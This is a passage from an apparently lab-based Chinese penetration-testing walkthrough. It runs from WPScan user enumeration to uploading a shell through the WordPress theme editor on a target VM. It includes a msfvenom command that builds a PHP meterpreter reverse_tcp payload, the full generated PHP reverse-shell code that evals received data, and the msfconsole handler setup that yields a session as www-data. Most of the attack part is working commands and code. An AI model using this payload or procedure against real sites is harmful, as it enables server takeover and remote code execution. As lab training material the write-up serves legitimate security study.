| - //192.168.216.151/wordpress/?feed=rss2, <generator>//wordpress.org/?v=5.2.2</generator>
| - //192.168.216.151/wordpress/?feed=comments-rss2, <generator>//wordpress.org/?v=5.2.2</generator>
[+] WordPress theme in use: twentynineteen
| Location: //192.168.216.151/wordpress/wp-content/themes/twentynineteen/
| Last Updated: 2022-11-02T00:00:00.000Z
| Readme: //192.168.216.151/wordpress/wp-content/themes/twentynineteen/readme.txt
| [!] The version is out of date, the latest version is 2.4
| Style URL: //192.168.216.151/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.4
| Style Name: Twenty Nineteen
| Style URI: //wordpress.org/themes/twentynineteen/
| Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
| Author: the WordPress team
| Author URI: //wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.4 (80% confidence)
| Found By: Style (Passive Detection)
| - //192.168.216.151/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.4, Match: 'Version: 1.4'
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <=======================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] victor
| Found By: Author Posts - Display Name (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at //wpscan.com/register
[+] Finished: Sat Nov 5 17:15:13 2022
[+] Requests Done: 69
[+] Cached Requests: 6
[+] Data Sent: 17.069 KB
[+] Data Received: 19.678 MB
[+] Memory used: 194.695 MB
[+] Elapsed time: 00:00:02
这里找到一个用户 victor 登录即可
登录上去之后,我们可以找到一个上传点并且上传一个shell木马
文件上传
上传一句话木马
- 找到上传点
- 传一个shell
- 可能会被杀毒软件杀掉
这种方式无法持续连接到靶机
- 内网
- 动态IP(ip变了)
我们可以使用反弹链接——让靶机主动链接到我的攻击机器
找到上传点
发现在主题编辑器中可以修改一些文件,大部分不可以修改,找到一个符合我们的上传shell的位置
利用msf
- 生成payload – PHP反弹链接
- 内置漏洞数据库 – 利用、提权
┌──(root㉿kali)-[~]
└─# msfvenom -h
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options] <var=val>
Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe
Options:
-l, --list <type> List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, encrypt, formats, all
-p, --payload <payload> Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom
--list-options List --payload <value>'s standard, advanced and evasion options
-f, --format <format> Output format (use --list formats to list)
-e, --encoder <encoder> The encoder to use (use --list encoders to list)
--service-name <value> The service name to use when generating a service binary
--sec-name <value> The new section name to use when generating large Windows binaries. Default: random 4-character alpha string
--smallest Generate the smallest possible payload using all available encoders
--encrypt <value> The type of encryption or encoding to apply to the shellcode (use --list encrypt to list)
--encrypt-key <value> A key to be used for --encrypt
--encrypt-iv <value> An initialization vector for --encrypt
-a, --arch <arch> The architecture to use for --payload and --encoders (use --list archs to list)
--platform <platform> The platform for --payload (use --list platforms to list)
-o, --out <path> Save the payload to a file
-b, --bad-chars <list> Characters to avoid example: '\x00\xff'
-n, --nopsled <length> Prepend a nopsled of [length] size on to the payload
--pad-nops Use nopsled size specified by -n <length> as the total payload size, auto-prepending a nopsled of quantity (nops minus payload length)
-s, --space <length> The maximum size of the resulting payload
--encoder-space <length> The maximum size of the encoded payload (defaults to the -s value)
-i, --iterations <count> The number of times to encode the payload
-c, --add-code <path> Specify an additional win32 shellcode file to include
-x, --template <path> Specify a custom executable file to use as a template
-k, --keep Preserve the --template behaviour and inject the payload as a new thread
-v, --var-name <value> Specify a custom variable name to use for certain output formats
-t, --timeout <second> The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable)
-h, --help Show this message
使用msfvenom生成payload
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.216.128 lport=7777 -o shell.php
查看这个shell.php
┌──(root㉿kali)-[~/payload]
└─# cat shell.php
/*<?php /**/ error_reporting(0); $ip = '192.168.216.128'; $port = 7777; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();
把第二个字符后的代码上传
使用msfconsole开始监听
访问这个文件 //192.168.216.151/wordpress/wp-content/themes/twentynineteen/secret.php
┌──(root㉿kali)-[~/payload]
└─# msfconsole
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.216.128
lhost => 192.168.216.128
msf6 exploit(multi/handler) > set lport 7777
lport => 7777
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.216.128:7777 ## 开始监听,只要访问那个包含我们payload代码的文件: //192.168.216.151/wordpress/wp-content/themes/twentynineteen/secret.php,我们这边就可以拿到shell
[*] Sending stage (39282 bytes) to 192.168.216.151
[*] Meterpreter session 1 opened (192.168.216.128:7777 -> 192.168.216.151:57438 ) at 2022-11-05 18:27:39 +0800
meterpreter > ls
Listing: /var/www/html/wordpress/wp-content/themes/twentynineteen
=================================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100644/rw-r--r-- 840 fil 2018-12-14 18:33:42 +0800 404.php
100644/rw-r--r-- 1229 fil 2018-12-19 19:18:26 +0800 archive.php
040755/rwxr-xr-x 4096 dir 2019-06-19 08:50:52 +0800 classes
100644/rw-r--r-- 3988 fil 2018-12-14 19:25:40 +0800 comments.php
040755/rwxr-xr-x 4096 dir 2019-06-19 08:50:52 +0800 fonts
100644/rw-r--r-- 1608 fil 2018-12-14 18:33:42 +0800 footer.php
100644/rw-r--r-- 10035 fil 2019-01-03 10:04:50 +0800 functions.php
100644/rw-r--r-- 1870 fil 2019-04-16 16:30:54 +0800 header.php
100644/rw-r--r-- 2874 fil 2019-04-16 16:30:54 +0800 image.php
040755/rwxr-xr-x 4096 dir 2019-06-19 08:50:52 +0800 inc
100644/rw-r--r-- 1060 fil 2018-12-19 19:18:26 +0800 index.php
...
meterpreter > getuid
Server username: www-data